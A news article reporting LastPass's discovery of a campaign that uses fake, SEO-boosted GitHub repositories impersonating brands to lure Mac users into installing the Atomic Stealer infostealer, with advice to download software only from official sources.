Mac users have a new reason to be cautious when downloading software. LastPass has revealed that cybercriminals are running a large-scale campaign using fraudulent GitHub repositories to trick people into installing the Atomic Stealer (AMOS) malware.
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team discovered the effort, which uses aggressive Search Engine Optimization (SEO) tactics to push malicious links to the top of Google and Bing results. The attackers create GitHub pages impersonating companies such as LastPass, 1Password, Citibank, Fidelity, Docker, Dropbox, Shopify, and dozens more. Once clicked, the repositories redirect victims to malicious websites that instruct them to run terminal commands on their Macs. Those commands eventually pull down the Atomic Stealer payload.
LastPass says it immediately reported and helped take down multiple GitHub pages targeting its own customers. One example involved a repository that pretended to offer “Install LastPass on MacBook,” which funneled users through a series of redirects until they unknowingly executed a CURL command that decoded into a malicious download from bonoud[.]com. That file planted the infostealer under the guise of an “Update” process.
Atomic Stealer is not new. It has been circulating since at least April 2023 and is associated with financially motivated groups that focus on harvesting passwords, crypto wallet keys, and other sensitive information. This latest campaign simply repackages an old threat in a new delivery method, using GitHub’s trusted reputation and search visibility to ensnare victims.
The list of impersonated brands is long. Beyond password managers and financial firms, the attackers set up GitHub repos imitating software projects like Audacity, Thunderbird, Docker, Notion, Obsidian, and even Adobe’s After Effects. This shows a broad shotgun-style approach rather than a narrow focus.
LastPass has shared a full set of Indicators of Compromise (IoCs) to help defenders identify infections and related infrastructure. Security teams can use these to block known domains and hashes linked to the campaign. The company is continuing to monitor the operation and warns that the same actors may quickly create new repositories after takedowns.
For everyday users, the advice is simple but critical: do not install software from random GitHub pages or unfamiliar websites, even if they appear high in search results. Download only from official company sites or trusted app stores.
LastPass stresses that protecting users is its top priority and says it will keep collaborating with industry partners to disrupt the attackers. But at the end of the day, personal vigilance remains the best defense.
